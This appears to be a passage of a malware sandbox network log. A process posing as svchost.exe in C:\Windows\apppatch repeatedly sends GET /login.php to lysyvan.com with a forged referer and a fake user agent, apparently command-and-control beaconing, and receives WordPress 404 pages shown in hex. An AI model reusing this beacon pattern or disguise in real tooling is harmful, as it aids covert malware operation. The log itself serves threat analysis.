                                                                                                                                                                                                          2024-11-11 17:25:58 UTC1369INData Raw: 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d
                                                                                                                                                                                                          Data Ascii: e,.woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type=
                                                                                                                                                                                                          2024-11-11 17:25:58 UTC1369INData Raw: 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 45 64 69 74 41 63 63 6f 75 6e 74 46 6f 72 6d 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2d 72 6f 77 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 49 6e 70 75 74 2e 69 6e 70 75 74 2d 74 65 78 74 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 61 73 74 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 69 6e 61 74 69 6f 6e 20 75 6c 2e 70 61 67 65 2d 6e 75 6d 62 65 72 73 20 6c 69 20 61 3a 66 6f 63 75 73 2c 62 6f 64 79 20 23 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 20 2e 73 65 6c 65 63
                                                                                                                                                                                                          Data Ascii: .woocommerce-EditAccountForm .woocommerce-form-row .woocommerce-Input.input-text:focus,.woocommerce .ast-woocommerce-container .woocommerce-pagination ul.page-numbers li a:focus,body #content .woocommerce form .form-row .select2-container--default .selec


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          13192.168.2.853549188.114.96.34431736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-11 17:25:59 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-11-11 17:26:00 UTC1083INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:26:00 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          server-timing: amp_sanitizer;dur="39.8",amp_style_sanitizer;dur="14.6",amp_tag_and_attribute_sanitizer;dur="19.8",amp_optimizer;dur="20.4"
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x1oh8r9mKlLNoJYvnWdzuKvm4aYVeUyhRNhyQczsrQQT%2BRyquiLJCABmPtPcEWccV2LDyGjlxsoWtRgi1OuNlv0flSzl0GZZnqDH5SvynmSCCXAItng4Vhrt2yuZug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ffc174951ac06-YYZ
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11837&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=881&delivery_rate=243955&cwnd=37&unsent_bytes=0&cid=49c92739f32545da&ts=1431&x=0"
                                                                                                                                                                                                          2024-11-11 17:26:00 UTC286INData Raw: 37 63 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                          Data Ascii: 7c22<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                          2024-11-11 17:26:00 UTC1369INData Raw: 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70
                                                                                                                                                                                                          Data Ascii: TF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!imp
                                                                                                                                                                                                          2024-11-11 17:26:00 UTC1369INData Raw: 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76 69 73 69 62 69 6c
                                                                                                                                                                                                          Data Ascii: uch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{visibil
                                                                                                                                                                                                          2024-11-11 17:26:00 UTC1369INData Raw: 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 5b 73 74 61 6e 64 61 6c 6f 6e 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 35 37 35 37 35 7d 61 6d 70 2d 73 74 6f 72 79 20 2e 61 6d 70 2d 61 63 74 69 76 65 3e 64 69 76 2c 61 6d 70 2d 73 74 6f 72 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 3a 6e 6f
                                                                                                                                                                                                          Data Ascii: portant}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:first-of-type):no
                                                                                                                                                                                                          2024-11-11 17:26:00 UTC1369INData Raw: 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 69 6d 67 29 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 2c 5b 6c 61 79 6f 75 74 3d 69 6e 74 72 69 6e 73 69 63 5d 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72
                                                                                                                                                                                                          Data Ascii: yout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;position:r
                                                                                                                                                                                                          2024-11-11 17:26:00 UTC1369INData Raw: 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 62 6c 75 72 72 79 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a
                                                                                                                                                                                                          Data Ascii: !important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolute;top:0;left:
                                                                                                                                                                                                          2024-11-11 17:26:00 UTC1369INData Raw: 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 3e 2a 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69 67 68 74 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65
                                                                                                                                                                                                          Data Ascii: -amphtml-layout-container)>*,[layout]:not([layout=container]):not(.i-amphtml-element)>*,[width][height][heights]:not([layout]):not(.i-amphtml-element)>*,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-ele
                                                                                                                                                                                                          2024-11-11 17:26:00 UTC1369INData Raw: 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f 72 74 61 6e 74
                                                                                                                                                                                                          Data Ascii: portant;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:red!important


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          14192.168.2.853554188.114.96.34431736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-11 17:26:02 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-11-11 17:26:03 UTC1082INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:26:03 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          server-timing: amp_sanitizer;dur="38.6",amp_style_sanitizer;dur="18.9",amp_tag_and_attribute_sanitizer;dur="14.8",amp_optimizer;dur="20.4"
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1pdnshuhj2FQouaovKGIqb4cBOZWU16Wjj7TZogvepW5jq5ObdluKzqGVVY0y96sEdnyZh1AbDDgrYHKCafSuaIxkgE2vE7HDmHTW6pof9CkeJOYj59nHvS1gdaLDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ffc27e9010c96-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2456318&cwnd=251&unsent_bytes=0&cid=2a9a016731b5290c&ts=1456&x=0"
                                                                                                                                                                                                          2024-11-11 17:26:03 UTC287INData Raw: 37 63 32 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                          Data Ascii: 7c24<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                          2024-11-11 17:26:03 UTC1369INData Raw: 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f
                                                                                                                                                                                                          Data Ascii: F-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!impo
                                                                                                                                                                                                          2024-11-11 17:26:03 UTC1369INData Raw: 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76 69 73 69 62 69 6c 69
                                                                                                                                                                                                          Data Ascii: ch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{visibili
                                                                                                                                                                                                          2024-11-11 17:26:03 UTC1369INData Raw: 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 5b 73 74 61 6e 64 61 6c 6f 6e 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 35 37 35 37 35 7d 61 6d 70 2d 73 74 6f 72 79 20 2e 61 6d 70 2d 61 63 74 69 76 65 3e 64 69 76 2c 61 6d 70 2d 73 74 6f 72 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 3a 6e 6f 74
                                                                                                                                                                                                          Data Ascii: ortant}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:first-of-type):not
                                                                                                                                                                                                          2024-11-11 17:26:03 UTC1369INData Raw: 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 69 6d 67 29 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 2c 5b 6c 61 79 6f 75 74 3d 69 6e 74 72 69 6e 73 69 63 5d 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65
                                                                                                                                                                                                          Data Ascii: out-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;position:re
                                                                                                                                                                                                          2024-11-11 17:26:03 UTC1369INData Raw: 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 62 6c 75 72 72 79 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30
